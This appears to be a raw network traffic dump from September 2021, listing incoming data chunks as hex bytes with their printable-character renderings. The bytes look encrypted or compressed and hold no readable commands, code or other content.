                                                                        2021-09-14 16:41:17 UTC128INData Raw: d7 a3 52 a1 dc b2 63 84 ff fc 07 dd 8f aa 61 3e 13 e0 e7 10 35 6b 08 b1 97 8a f5 81 f0 cc cf b8 3d 01 ab 82 ce b2 89 62 d8 24 48 b6 a9 60 d3 7b ff 39 68 3b 63 7a d6 18 a7 bb 5b 1c 5c 0d d5 8f b7 50 76 e1 b2 3f 7d 3a 84 9f f7 e8 b6 47 50 0f b2 cc 5a 28 6d 96 69 0c ba d3 79 49 85 0a d6 d3 dd bb ef 95 3c be 5c 3d 26 1d 3c e5 a4 67 2f b8 76 30 f7 92 06 b2 d9 47 b2 24 f6 1a 04 0c 13 3b 7a fb 5e 73 43 2f 2c e7 cd 61 f9 3d 56 38 20 f5 a3 be 30 1e 2d 1a a8 ff bc d4 7a 50 ff 03 74 00 a1 36 b0 aa 66 24 c7 6f e8 e1 c9 15 92 55 a8 54 e2 49 42 3b 90 53 79 3e c2 31 48 16 d5 f5 3c 90 1b ab 29 a3 55 76 9f 4d 62 d8 b2 84 70 72 14 ac 46 0c e3 ed ee c9 4e e3 b5 75 52 5d 70 54 cc 8f cf 5e 9a 58 2b 5b 25 46 92 4d 63 20 f2 f3 59 0d 5b 0e b2 6b 14 b7 03 4b d9 27 74 bf 13 75 8c
                                                                        Data Ascii: Rca>5k=b$H`{9h;cz[\Pv?}:GPZ(miyI<\=&<g/v0G$;z^sC/,a=V8 0-zPt6f$oUTIB;Sy>1H<)UvMbprFNuR]pT^X+[%FMc Y[kK'tu
                                                                        2021-09-14 16:41:17 UTC129INData Raw: 75 b9 93 1c ae 2b ad 34 32 1f 43 bc fb 28 a7 c1 91 68 77 47 48 a9 f0 f3 4f 3c 1c 9e 29 8e d9 30 22 3a 8b e7 e8 8d c2 26 4c 53 56 4e 6a cc 44 c0 6f a9 87 a7 de ed 64 92 c3 24 e3 e9 a9 22 11 6b 3e c4 bc 51 45 30 0e 71 24 b9 7c 83 3f 53 cd e7 10 f4 49 43 0b ad e9 84 53 dc d5 dc a2 97 b0 c2 b0 2d 00 79 82 e7 e6 de 03 92 3f 54 e3 4f 2e 71 07 5c f6 e7 5b 2c 5b fd d0 c3 9b 83 3f 9c b8 ea 75 2d c6 be ca ac 8c b5 38 c9 ad b1 56 15 7e 5e 0e 4c 17 00 63 cc de b0 0a b8 6a e4 87 5c e3 67 9e 1a a3 ef 79 57 3c 37 91 e9 a1 ae e7 c1 fa a4 18 16 0b 4e 0c 55 cc 06 68 6a bb 0d 79 9a 40 a1 bb c2 30 2d b4 f6 19 4a 6d 9c a4 25 a1 5b 94 c1 6b 37 20 b1 35 2e 84 d3 77 ef 21 b1 61 64 b2 6f 95 24 04 d8 9b 84 1f aa 2b 6d aa 64 4e 68 71 e8 42 0b fe 1a 33 b2 28 33 d0 b4 56 9b 56 26 ff
                                                                        Data Ascii: u+42C(hwGHO<)0":&LSVNjDod$"k>QE0q$|?SICS-y?TO.q\[,[?u-8V~^Lcj\gyW<7NUhjy@0-Jm%[k7 5.w!ado$+mdNhqB3(3VV&
                                                                        2021-09-14 16:41:17 UTC130INData Raw: bd 46 c6 a5 f6 a3 26 2a e6 da bc 96 4e f5 f6 e3 3f 5a 0f a8 a4 f9 8e 14 df 8f c2 67 72 1a 32 60 03 4f 13 a1 79 89 04 22 14 55 0a 6f b0 1a a8 d4 a0 87 e0 b5 d8 a2 78 ef 46 8b 22 ec ae 19 7f 34 9c 1e 20 fd a6 68 1d 95 5f c6 6b 5b 5f e0 75 42 9d cb 23 f9 68 86 93 f2 36 22 9b 4f 94 ac 9d 1f 6c fd 81 4f ac 16 3e d7 90 28 fb 9d 0a cd 71 82 15 33 00 35 33 72 f4 bf 16 ad 55 4e 65 ce ac fa fc 4c 6f 95 a4 e3 7b 77 bc 52 a5 ce 73 1b 39 56 65 c9 e1 68 12 52 99 26 3c 39 2b 8d 6b a0 3a 6e b7 f5 25 32 c1 97 42 d5 ab d6 a8 f0 ed 47 a3 1e 9e 2f 3e 7e 63 aa 1d ab 51 c8 15 c2 06 2f c1 73 63 6c c2 49 5a 6f af ad 05 36 73 65 92 de 2c 7d eb a9 24 a1 c8 6d 4c 9b 71 f2 10 97 71 04 dd ee a6 12 58 c3 ea 8b f4 4f 69 ad 4a 77 85 53 c7 ff 40 8f 95 b0 5e bf 86 6c c6 a3 53 e2 fe 99 b2
                                                                        Data Ascii: F&*N?Zgr2`Oy"UoxF"4 h_k[_uB#h6"OlO>(q353rUNeLo{wRs9VehR&<9+k:n%2BG/>~cQ/sclIZo6se,}$mLqqXOiJwS@^lS
                                                                        2021-09-14 16:41:17 UTC131INData Raw: c5 4f c2 4f 1b 5f df 37 12 cb 58 82 1d 22 45 5f bf e1 80 ef fc fc 86 55 94 32 83 81 fb 85 af b2 c6 17 0f 24 fb d4 25 3b e0 43 56 35 c3 cd 36 96 2b 91 44 cd fb f1 e6 4e ac 85 a4 cb 96 5c e4 91 3a e9 31 34 54 98 8b 0d c7 b5 41 b4 50 26 6d d2 27 df 09 31 5d 73 33 17 1e 01 52 3a 0c 5b bc 31 39 75 ed ce 81 51 b0 01 09 b1 be 5c 28 7c 3b f9 84 0d 8d d5 78 8f 41 29 22 51 08 a8 df 4a 44 fc a6 57 a7 29 3b 70 9f 09 ef ef 98 80 8b 35 2e c7 e2 03 4e f7 a5 43 0c 55 3f 8f a9 ba 5c a5 c6 a6 8b 39 15 c7 60 01 26 c1 78 05 48 c0 64 8e 99 12 48 2a d8 9c 57 e0 ff da b4 5e 79 c8 f3 76 4c 55 e8 e7 ee f6 fa a1 72 b5 fa d8 1d 02 df d4 2e c0 e2 36 6e 95 63 5f f9 7d 11 41 d7 b1 97 96 47 89 df de ef b2 89 7f 32 83 ee 85 9a 0c 42 1e 44 91 a2 7d bd 5d c5 ba 16 a2 7d 6a fa 15 7e bb 5d
                                                                        Data Ascii: OO_7X"E_U2$%;CV56+DN\:14TAP&m'1]s3R:[19uQ\(|;xA)"QJDW);p5.NCU?\9`&xHdH*W^yvLUr.6nc_}AG2BD}]}j~]
                                                                        2021-09-14 16:41:17 UTC132INData Raw: 82 c9 74 ef 2c 9a 77 27 42 8b 12 7b 7b 46 fc 7f 16 0e d5 ce 6e 14 2d 3b 4e e5 03 54 42 39 1b f2 62 d1 b9 5d 46 7e 4d 82 0e 0c 83 dd e6 0a 8a c2 df c3 85 0e 83 8b 2a 7c ff 0b a1 45 c7 2c c3 92 5a 2f a9 8a c5 86 0b 88 b8 e0 4d 5f 1e 18 e4 57 54 6c 38 7c a9 fd 02 ba 55 90 4a 07 2e a3 e5 7b a7 4e b5 f8 fa 56 a4 4e 95 0a d9 84 34 7b 1e 1c 4a 3f 82 3f 6d 3d 6f 7f 69 6b c1 7a 57 42 49 af 13 03 56 68 a6 f3 dc 7b 2a 84 54 a3 88 b7 32 68 d7 05 1b b3 69 a7 d2 b0 d3 db 2d 0a 57 54 35 21 38 32 ec 13 c2 f4 9f 6d 83 03 46 72 e6 9e f1 d4 67 47 17 dc 50 f8 09 21 73 a5 cb 53 aa a3 73 48 42 e2 65 03 75 b9 97 1c 45 25 ad 34 b2 12 43 af dd 0e 1a 43 ef f1 56 d5 4b 89 f1 e8 67 11 84 bb 02 b5 7d 6e ba 3a 8b e3 e8 95 cc 26 4c d1 5b 4e 79 ea 62 72 e9 d7 1e 86 48 ee 44 90 db 0c ce
                                                                        Data Ascii: t,w'B{{Fn-;NTB9b]F~M*|E,Z/M_WTl8|UJ.{NVN4{J??m=oikzWBIVh{*T2hi-WT5!82mFrgGP!sSsHBeuE%4CCVKg}n:&L[NybrHD
                                                                        2021-09-14 16:41:17 UTC134INData Raw: 4e 94 3e 2c d5 1c 94 19 80 b2 1c 1b 48 4c 6c 57 5c c0 75 67 81 16 9b 1a 37 f1 2a 56 01 73 2b 26 29 a0 e1 03 5d 58 d6 7f f4 4d 42 7f 53 7c 8c e2 61 c5 cb 65 c0 f4 b1 68 72 7a 83 19 02 0b 7a 92 f3 3c ea f2 ef a0 75 60 ae 93 81 db fc ae 9a eb 0a 2a 0a fc 54 5b a4 cb c5 2c 8c e6 cc 32 b6 64 b4 69 dc 47 f4 ef 5d 8a a5 51 6d 86 5c c4 07 19 c4 33 2b 76 9a 20 71 5e b2 6b 36 0e 9a 6d d2 23 65 fa 1c 4f 55 89 17 32 13 74 3a 77 4b bc 31 06 d3 ce e3 83 4e 97 03 a2 cd 27 5b 02 fe 65 46 84 0d 89 6f 8a a2 53 0f 98 52 24 ba f9 4a 25 ec a6 57 98 f2 18 5d 9d 16 c8 ed 33 fc 12 32 04 45 bc bd 4e f7 a1 f9 f1 78 2d a9 13 b8 70 b7 e0 a6 92 29 15 c7 5f fd 05 ec 7a 1a 6f c2 cf f2 00 15 62 a8 86 2d 57 e0 fb 60 48 73 6b ee 49 7b 60 47 ce e7 f9 e6 fa a1 4d ae de f5 1f 1d f8 d6 85 bc
                                                                        Data Ascii: N>,HLlW\ug7*Vs+&)]XMBS|aehrzz<u`*T[,2diG]Qm\3+v q^k6m#eOU2t:wK1N'[eFoSR$J%W]32ENx-p)_zob-W`HskI{`GM
                                                                        2021-09-14 16:41:17 UTC135INData Raw: f9 1a 90 1f bd 5c c5 04 9c 03 36 33 9d f4 23 9d 13 5e 39 a3 53 43 d5 1b d6 db b2 86 45 80 f0 10 6a 03 c1 d2 d3 e8 2b e6 2f 50 60 58 7e 59 87 8e c9 74 d0 da a0 5a 25 5d 82 10 d4 07 df fb 55 94 50 b7 cf 6e 10 97 54 62 f4 25 ee 9c 14 09 d4 62 61 b5 5d 46 43 6e bc 0c 0c 9a d3 48 59 11 c3 d9 ed 23 8c 1a 8a 2a e2 fa 6d b2 63 e7 4a e6 bf 48 29 88 cf c4 86 14 ff bf de 4f 5f 07 21 4e 04 cf 6d 3e 52 0f 7e 9b bb 55 0e 4f 66 3e 85 c5 1c 82 63 a7 fe 82 14 a5 4e 8b 02 b6 95 34 7d 2b be 1c 8b 81 3f 6f 37 17 01 f0 6a 5b 5b 5a 1d 6e 8f ed 99 73 45 94 b5 f2 36 2b 9b 4f ab c3 a6 32 6e e2 a2 4d 07 6a a7 d0 ba aa a5 b4 0b cd 75 38 7e 1f 12 13 89 e7 d9 ad 30 ad 4d 47 65 ce 93 78 c7 61 6d 8a 86 e1 d4 0b 25 55 8f 4c 2d 33 38 56 61 73 8b 44 03 74 23 b2 11 2b 0d 8d 7b a9 3a 6e 8d
                                                                        Data Ascii: \63#^9SCEj+/P`X~YtZ%]UPnTb%ba]FCnHY#*mcJH)O_!Nm>R~UOf>cN4}+?o7j[[ZnsE6+O2nMju8~0MGexam%UL-38VasDt#+{:n
                                                                        2021-09-14 16:41:17 UTC136INData Raw: af 31 26 5a 00 f3 2e 9f 69 6a 9f 9a 11 9b 40 be 2c cf 30 3d 92 d0 5c c9 13 05 85 e5 b0 7b 09 de 67 1f 97 96 18 39 88 75 94 76 20 b1 45 80 c5 6e 95 3e b6 d0 b4 96 3f a0 dd 12 33 65 6e a0 44 76 42 14 de a8 3b 9d 3a 13 da ac 28 02 57 06 33 2f f1 c2 02 5d c2 d3 c6 f6 6b 62 10 7a 51 8e c2 8b fa 4d 1b 46 f8 99 41 50 59 84 33 84 ef c6 be e1 1e ea a3 ef a0 75 da 17 ae 93 fd c3 d6 b3 c6 08 0a f5 c3 d6 25 22 c6 ed 05 ae c2 cb 18 30 80 08 45 cd 65 f4 b8 5d 8a a5 eb ee bb 4e e2 3a 42 e8 31 2b 50 b5 b0 0f c7 ac 61 1a 03 bd 6c d4 09 79 a1 a8 5c 73 ad 12 47 12 74 1a 40 7e 91 23 3f fa 92 cf 81 4e b1 26 32 b3 be 45 09 d2 68 62 85 0b a3 73 d1 16 40 29 bc 54 50 bb f9 6a 09 d9 8b 45 a1 d9 45 71 9f 16 ee dd a3 82 8b 2c 32 69 b1 98 4f f1 8b e1 aa cc 3e 8f 37 bf 07 b6 e0 86 c9
                                                                        Data Ascii: 1&Z.ij@,0=\{g9uv En>?3enDvB;:(W3/]kbzQMFAPY3u%"0Ee]N:B1+Paly\sGt@~#?N&2Ehbs@)TPjEEq,2iO>7
                                                                        2021-09-14 16:41:17 UTC138INData Raw: aa eb 4a 46 2f 0c f4 fd 4c fb 26 78 3f 4c 8b 3c 95 b2 64 ab 69 32 de b1 4d 5d 4f 8d b9 6e 28 b0 10 8f 25 4f 09 c5 4f fd d3 a7 6b 16 7c 85 52 fd 3c f2 9c c3 c5 5e 21 b5 31 87 12 d5 f5 b9 b8 1e 97 0d 83 c4 5d f1 33 db c3 aa 80 6f 1c a6 a4 69 03 c3 d8 1c 97 b2 e7 b5 71 6d d2 59 79 ce 15 ec 59 e2 00 92 c2 24 42 8d 18 e7 1d df fd 60 02 06 03 cc 6e 12 9d 98 1d 6d 24 74 bd 19 82 f3 42 2b 2e 78 6b 71 43 8f 95 0d 85 f7 40 5a 0b c3 df d8 a8 da ae 89 2a e0 f0 a0 cd fa e6 d0 c7 b2 c0 0e a8 84 5f a3 39 cd b6 ed d5 5e 18 32 46 12 d5 6d 38 67 86 28 2f b8 55 0c 45 a8 41 1c c4 86 a3 6e 2e d9 a2 58 3e 6b a6 33 d2 a6 af 7c 34 9a 14 ec 9b 3f 69 05 b9 52 6b 6b 5d 75 fc 2e f6 8e ed 07 76 f4 87 93 d2 e1 0f b6 5d ad 85 29 33 6e fd a7 29 32 68 a7 c9 8c 04 f6 2f 0a cb 5b 9e 4e 87
                                                                        Data Ascii: JF/L&x?L<di2M]On(%OOk|R<^!1]3oiqmYyY$B`nm$tB+.xkqC@Z*_9^2Fm8g(/UEAn.X>k3|4?iRkk]u.v])3n)2h/[N
                                                                        2021-09-14 16:41:17 UTC139INData Raw: 97 ed 38 b4 15 16 ac 3c e9 2b 99 7b 17 e4 7d 09 d8 4f b9 f9 cc da 90 97 14 6d e4 1d 66 c4 5d 95 38 1e e8 53 d1 62 0c 89 e9 a5 91 63 e9 d7 a6 82 35 0c de 54 ec 51 06 6c 4a 25 bb 7e 9a da 9b 9b fb 3b 0f 0a f1 33 c8 33 bf bc 25 a5 66 21 ec 69 37 bc be 9a 41 3b f2 ea eb 01 0e 40 a0 b5 f5 b0 13 3d d3 b9 3b 18 80 ad 33 f2 7c 4e 6c 4d 5e 6f 09 fe 86 3c 19 44 8c f1 2a 52 bb 96 07 37 0f 1a e6 2f 4f 7e d6 2b e5 4d 42 41 bc 48 8e e2 78 e6 65 36 5b f5 b7 46 d4 27 1b 18 02 95 7f 7e e0 1a ca 4b cb 8d 67 66 12 42 80 db e3 84 62 df 08 2a 13 fa fe 08 3f ca c3 02 2e bc 54 33 b6 fa b1 86 cc 61 d4 51 79 a7 b4 57 eb 54 5d c4 1a 11 15 28 2b 70 ae 8e 22 c5 b3 6d 18 ac c1 f5 d3 23 fb ff f2 5c 73 a9 a8 16 3e 65 3c fa 98 bd 31 19 fa e2 d4 81 4e 8f 01 09 b1 be 5c 28 7c 3b f9 84 0d
                                                                        Data Ascii: 8<+{}Omf]8Sbc5TQlJ%~;33%f!i7A;@=;3|NlM^o<D*R7/O~+MBAHxe6[F'~KgfBb*?.T3aQyWT](+p"m#\s>e<1N\(|;
                                                                        2021-09-14 16:41:17 UTC140INData Raw: 51 0a 8e 91 43 62 e4 c4 63 49 81 08 8e 64 fa 96 e6 99 a5 b0 e5 1b 23 19 1c 1e b4 4f 02 20 53 1b cf de 58 cf d9 47 b6 1b 12 9b 21 21 02 08 4d a7 7c 4b 40 05 aa 84 7c 4d fb 39 70 f7 4f 8b 3a 25 15 37 20 4e 12 3f 90 db 5c 6f 27 38 4b 05 be 3f 87 9e 4c 09 c3 45 68 b5 3e 6a 0b 50 88 b6 fc 3a d8 84 98 71 4d 07 91 f7 11 13 d5 d5 90 86 33 86 34 a9 7b 71 f3 33 fd f3 34 fe f6 07 8e 8d 4b e4 c4 f2 9a 73 0e cb a7 53 6d ad 59 79 ce af 74 6f f0 26 ad 51 0d 6f 8f 38 ff 2f 5d 83 e6 13 2e 2a ee 86 15 b7 1e f9 d1 08 65 9f 19 f3 f3 42 2b 94 95 5d 63 65 b3 24 21 87 f7 66 5e 91 bd 46 c6 a5 f6 a3 62 2b e6 da bc 96 4e f6 f6 e3 7b 5b 0f a8 a4 0b 9d 14 df 8d e5 62 5d 18 34 4c af b3 f4 39 78 8d 20 e8 bb 55 0a f5 0f 12 97 e3 a6 4d 4f b5 d8 82 8d bf 4e 8b 3d fe ae 19 7f 34 9c 1e 20
                                                                        Data Ascii: QCbcId#O SXG!!M|K@|M9pO:%7 N?\o'8K?LEh>jP:qM34{q34KsSmYyto&Qo8/].*eB+]ce$!f^Fb+N{[b]4L9x UMON=4
                                                                        2021-09-14 16:41:17 UTC141INData Raw: 6f 63 21 36 ee 84 73 fe c2 f4 8f 8a bb ec b7 a9 7e e6 a9 61 9c 67 98 92 3b 74 72 68 03 63 bb 59 41 f5 7d 0c 70 5c d7 c3 bb d4 28 b4 95 f7 79 03 c1 3a b4 33 a7 33 42 70 37 b1 52 35 e8 79 23 5e ab 05 d5 de f8 90 26 17 6d e4 a7 17 f4 4f b3 07 ae c1 7e d3 42 a8 ba 6f db 17 7a c1 fe 84 8f 31 26 5c b0 50 7d 14 4e 4a 96 b8 7e 9a 60 df ab ea 1d 30 ba d8 1e ca 13 03 8f a3 db e2 08 c1 6f 17 b4 96 18 3f 38 d6 c7 fd 07 91 4f a2 b5 6f b5 51 31 f5 99 9b 0b a8 80 11 33 63 64 ea 2f ef 43 0b fa a0 19 9d 3a 15 6a 0f 7b 89 70 26 38 0d 80 c3 22 dc 45 f6 eb fb 5e 6a 4c 79 51 88 c8 e1 91 d4 1a 59 f1 91 7c 50 59 82 83 27 bc 4d 99 c1 0a c8 d1 ee 80 e1 5d 32 83 9e cd cb 89 b0 c6 0e 00 8a a8 4f 24 3d ce e5 39 ae c2 cd a8 93 d3 83 62 ed 70 d6 cb 5c aa 0f 6c cb 96 43 d3 32 1c eb 31
                                                                        Data Ascii: oc!6s~ag;trhcYA}p\(y:33Bp7R5y#^&mO~Boz1&\P}NJ~`0o?8OoQ13cd/C:j{p&8"E^jLyQY|PY'M]2O$=9bp\lC21
                                                                        2021-09-14 16:41:17 UTC143INData Raw: 87 ee 87 94 0c 42 9b 40 94 9d 59 9d 6a ed 3c 68 1b a3 4a fe 35 ba b6 75 1b 34 73 4a a4 31 2a f0 8f 28 1e 70 06 a0 80 98 52 b3 6f 42 29 8f d6 75 2a 6d b0 af 42 c4 4a 67 42 a9 38 a4 49 fe bc 62 cd ba cf 7c 1e 03 2e 3e fa b5 d5 27 97 67 10 fd cb 7a 2b d8 67 41 1b 87 80 3c 09 30 1f 65 8c 54 cd 38 b6 2d fa e1 6c cf 3f 50 12 d4 ae 17 ad 16 3a 06 6a 32 da b1 25 7c 4f 8d 3c 7a 2d 8c 34 af b5 64 8f bb f6 ef cb a3 4b 3e 56 a8 50 67 1f f5 0c 9b 7c 6a 23 b1 11 30 3c f4 f5 23 82 39 ae 06 a1 53 5a db b5 85 40 b3 80 6b 26 b8 8b 6b 03 5f d7 b7 fb 0d c6 83 77 4d 4a 78 40 ef 8f c9 6b df 0e 9f 58 25 44 a7 be 87 9c de fd 7b 32 19 2c ce 6e 8e 92 33 71 d2 05 43 bb 39 1b d2 2a 0a b4 5d 59 68 4d 82 0e 0c 83 dd e6 0a 8a c2 df c3 85 ca 81 8b 2a 7c ff 0b a1 45 c7 e8 c1 92 5a 2f db
                                                                        Data Ascii: B@Yj<hJ5u4sJ1*(pRoB)u*mBJgB8Ib|.>'gz+gA<0eT8-l?P:j2%|O<z-4dK>VPg|j#0<#9SZ@k&k_wMJx@kX%D{2,n3qC9*]YhM*|EZ/
                                                                        2021-09-14 16:41:17 UTC144INData Raw: e5 e2 93 bc bf 4d c9 77 43 23 e8 64 58 f5 8c aa 95 6e ca 3c 90 da 0c ee 66 8a 24 3b f2 50 75 90 53 41 16 bd f7 5a 20 e7 a6 16 61 b2 c5 89 f4 d3 66 06 26 c8 a4 0a c1 df f4 af 08 93 c4 9a b4 66 c8 ae e5 e2 f8 b3 14 41 cd 78 6a 07 43 7b 7e 6c e7 c1 09 56 4c f1 e3 c1 9e 35 b4 b5 5d 56 2b ec 27 bb 1d a0 b7 3c ef 1c 33 28 8c e5 7b 27 7e 6a 22 f8 cc 44 95 07 04 4b c4 dc 41 e9 4f 93 dc 80 e9 53 cf 6a 83 92 e9 a3 a4 fd bf 63 a5 82 37 06 00 28 75 50 9c 4d 47 89 9c 5e c6 42 be b6 ca d1 0c b4 f0 2c d0 3b 28 a7 25 a3 51 8b bf f2 36 ba 90 38 62 a0 f3 ea 75 04 9c 50 86 95 32 97 3e 2c d5 7d a7 19 80 b7 3b 1e 67 4e 6a 7b f4 3c 92 ff 80 12 bf 64 17 f0 2a cc be 7b 17 11 2f de c1 02 5d 78 1e c8 e4 4d 5c 49 56 53 8e e4 4d 69 33 82 58 f5 b5 4c 0d 5b 82 19 98 b4 72 ad c7 3a 95
                                                                        Data Ascii: MwC#dXn<f$;PuSAZ af&fAxjC{~lVL5]V+'<3({'~j"DKAOSjc7(uPMG^B,;(%Q68buP2>,};gNj{<d*{/]xM\IVSMi3XL[r:
                                                                        2021-09-14 16:41:17 UTC145INData Raw: be 7b 79 c8 7e 7b 4c 45 ce c1 1d 70 84 38 53 a7 f2 f8 62 1f fe fc 99 e7 cf 22 62 33 62 c4 f8 7d 35 b5 28 b1 97 89 d2 84 df ce c9 94 79 f9 4c 1a cf b6 92 2c c2 03 65 b9 15 5a 90 49 c9 1c e8 39 7c 6a de d6 80 bb 5d 29 38 5b 61 8c b7 52 43 08 56 83 51 34 a6 a0 19 ca 96 42 ca 2a 82 f6 51 0a ec 92 43 62 e4 bb 5d 49 81 0a ba 61 d5 94 e0 b5 09 48 02 83 22 1d 38 da 37 4d 02 ba ec 13 f0 ea 5e 0b 5a 45 b6 3b a7 8d 07 21 1d 02 78 a2 53 49 46 29 06 7c 9b d5 fa 3d 54 32 cd 89 3a bf aa 3f 1f 7a 14 fa 12 d9 5c 4f ad 09 6d 05 a1 29 a2 9b 63 0b c5 69 c4 4d d9 f2 0a 54 ac 70 79 38 d8 1e 27 79 72 33 97 31 94 11 d5 f5 03 aa 15 86 2b bc 47 74 dc 31 fb df 98 06 11 9f 8f 89 6f 23 40 f0 9a e9 b1 c3 98 67 6b 6a dd 7b ce 8f e9 3f d6 26 b2 45 31 6a a0 3a f9 03 f5 7b 01 8b 2f 2e ca
                                                                        Data Ascii: {y~{LEp8Sb"b3b}5(yL,eZI9|j])8[aRCVQ4B*QCb]IaH"87M^ZE;!xSIF)|=T2:?z\Om)ciMTpy8'yr31+Gt1o#@gkj{?&E1j:{/.
                                                                        2021-09-14 16:41:17 UTC146INData Raw: 0c f6 36 03 3d ca d2 00 81 c0 cd 34 9c 7c ef dd cc 61 d0 eb c9 88 a5 71 51 b3 71 d5 3c 11 7c 33 2b 70 90 47 29 c7 b3 73 1a 03 bd 6c d4 09 7d a1 a8 5c 73 ad 12 a5 11 74 1a 40 7e 91 20 3f fa 70 cc 81 4e b1 ca 02 b3 be 4d 2a d7 47 60 83 27 0b 8b 36 8e 41 2d 98 e3 27 ba f9 f0 b6 d1 b7 71 a7 6e 32 70 9f 36 2a e1 b5 82 93 1b 29 43 9c 9c 65 75 df fa d5 55 3b af ab 9d 71 b7 7a a3 7e 28 33 e7 d8 f2 2d c1 58 fc 4f e8 49 9b b1 39 60 ac a0 2f d4 9e 62 fb 6d 5a 59 51 6b 53 61 dd eb ea 26 d0 da 38 50 a7 f6 f8 fa 3b fe fc 1b ea cf 32 44 15 37 44 86 e4 14 61 09 91 0d 94 dd ac 68 e9 e4 83 75 5f a8 81 ce b6 b6 e5 64 01 65 ae a7 52 bf 5b e9 16 ea 45 e5 6b fe 31 85 20 5f 36 36 e9 69 a3 a6 72 49 15 2a 1a 50 14 48 a6 98 c8 8e 6a 7d 0d af e2 5d a8 13 09 42 62 c0 6a e4 4b 81 15
                                                                        Data Ascii: 6=4|aqQq<|3+pG)sl}\st@~ ?pNM*G`'6A-'qn2p6*)CeuU;qz~(3-XOI9`/bmZYQkSa&8P;2D7Dahu_deR[Ek1 _66irI*PHj}]BbjK
                                                                        2021-09-14 16:41:17 UTC147INData Raw: 5d 59 6a 4d 82 0e 0c 83 dd e6 0a 8a c2 df c3 85 4e 81 8b 2a 7c ff 0b a1 45 c7 6c c1 92 5a 2f 9b ac c5 86 0b d0 b8 e0 4d 5f 1e 18 e0 57 54 6c 38 7c a9 bd 00 ba 55 90 4a 07 2d a3 e5 3b a5 4e b5 f8 e0 70 a4 4e 94 34 dc ab 36 7d 32 b0 b2 d8 1a 3e 69 19 b1 c1 6b 6b 5b c5 5f 7d 7d a9 cd bd 54 68 86 b3 8a 53 2a 9b 50 85 8d 98 30 6e fb ad e7 54 f1 a6 d6 94 0c 64 2f 0a cd eb 3d 1d 0f 34 33 ac c0 f4 bf 36 eb 2b 46 65 d5 9b de d6 61 6b bf 24 b7 60 08 25 57 85 0a 51 aa 39 cc 40 7e d6 63 23 b4 bb 97 3c 19 40 85 34 a8 25 60 85 f0 0a 30 c7 bb ea 29 4c 4e a9 f4 c9 a6 13 1e 9e b5 81 76 5f 9d 1b 4a e1 c8 15 e2 5f 64 c9 73 7d 53 c7 66 58 69 83 05 f9 d1 eb 64 96 fa ce cc eb a9 be 1e c0 51 7b 9d 93 43 10 97 51 a5 91 e6 a6 0c 69 c6 c5 89 f2 63 c5 55 ad ef 84 57 e3 1c f6 8f 95
                                                                        Data Ascii: ]YjMN*|ElZ/M_WTl8|UJ-;NpN46}2>ikk[_}}ThS*P0nTd/=436+Feak$`%WQ9@~c#<@4%`0)LNv_J_ds}SfXidQ{CQicUW
                                                                        2021-09-14 16:41:17 UTC148INData Raw: 2f 4f 7e d6 09 e6 4d 42 41 e6 7a 8e e2 78 cb 65 36 5b f5 b7 46 d0 27 1b 18 02 95 7f 5c e3 1a ca 4b cb 8d 64 66 12 60 83 db e3 84 73 ed 08 2a 14 fe fb 27 3d cc ef aa d2 5b cc 32 b2 de 75 46 cd 61 4e ee 71 9b 83 51 2f 94 5c c4 3a f2 c2 31 2b 6e 98 8b 0d c7 b5 41 b4 50 26 6d d2 27 df 3a 33 5d 73 33 17 1e 01 52 3a 3f 59 bc 31 39 11 cd ce 81 51 9a 01 09 b1 be 5c 28 78 3b f9 84 0d 8d d5 49 8d 41 29 22 51 08 ab df 4a 75 fe a6 57 a7 2f 1b 70 9f 08 e6 ea b7 82 8d 19 82 3f 05 9b 4f f3 81 84 d6 55 3f 15 16 b2 63 91 c0 61 51 39 15 e7 9e db 2d c1 67 30 41 c5 4b 8c 9f 3e e4 d2 3f 04 56 e4 db 12 6f 5e 79 52 4c 7e 73 61 ee 2f 35 f6 fa 81 5a 8b f6 d8 02 0b d6 d1 01 c2 e4 1a c2 6d 84 c7 f8 79 35 88 0f b1 97 0c f8 81 e0 ea e9 7b 51 7f 32 a3 d0 9a 96 0c 5d 0b 4d 94 8d 7f bb
                                                                        Data Ascii: /O~MBAzxe6[F'\Kdf`s*'=[2uFaNqQ/\:1+nAP&m':3]s3R:?Y19Q\(x;IA)"QJuW/p?OU?caQ9-g0AK>?Vo^yRL~sa/5Zmy5{Q2]M
                                                                        2021-09-14 16:41:17 UTC150INData Raw: f1 9a e9 b1 c3 98 64 6b 6a 51 7a ce 8f e9 e6 dd 26 b2 46 0d 6f 8f 38 ff 2f 59 83 e6 13 2e 2a ee 64 17 b7 1e f9 d1 08 66 9f 19 11 f1 42 2b 94 c5 6b 63 65 b0 3e 24 a8 f5 60 72 39 45 a1 5e a4 f2 87 ab 21 e5 da 26 29 46 ca c2 e5 b2 51 0c a8 84 e5 4c 39 df 90 d2 54 77 35 30 66 2f e7 eb 46 e1 88 00 06 9a 59 09 6f 2a a5 a0 e8 94 81 6e b9 db a2 58 84 ab a6 22 f4 99 1d 55 19 98 34 a0 a9 b9 17 84 90 7f 6d 4b 56 5c 7a 50 f5 aa c0 11 70 48 8b 90 d2 7b 0a 95 61 8b a5 aa 03 46 d0 85 65 2c 42 21 a8 09 2d db 29 2a c3 72 18 30 84 37 3e 01 e4 d4 b1 15 8d 03 66 5a e0 b3 f3 cb 43 45 b8 a0 c9 ff 23 a3 2d 3c cb 53 ae 19 59 66 53 c4 df 26 59 ab b1 1c 36 28 ad 34 88 5b 40 ad dd 17 2b e9 bc 6a 57 d3 65 2b 8e 70 66 11 1a be 3f a7 5b 4e 21 1e a6 f2 ee 35 d2 25 4c c9 53 1f 55 ea 64
                                                                        Data Ascii: dkjQz&Fo8/Y.*dfB+kce>$`r9E^!&)FQL9Tw50f/FYo*nX"U4mKV\zPpH{aFe,B!-)*r07>fZCE#-<SYfS&Y6(4[@+jWe+pf?[N!5%LSUd
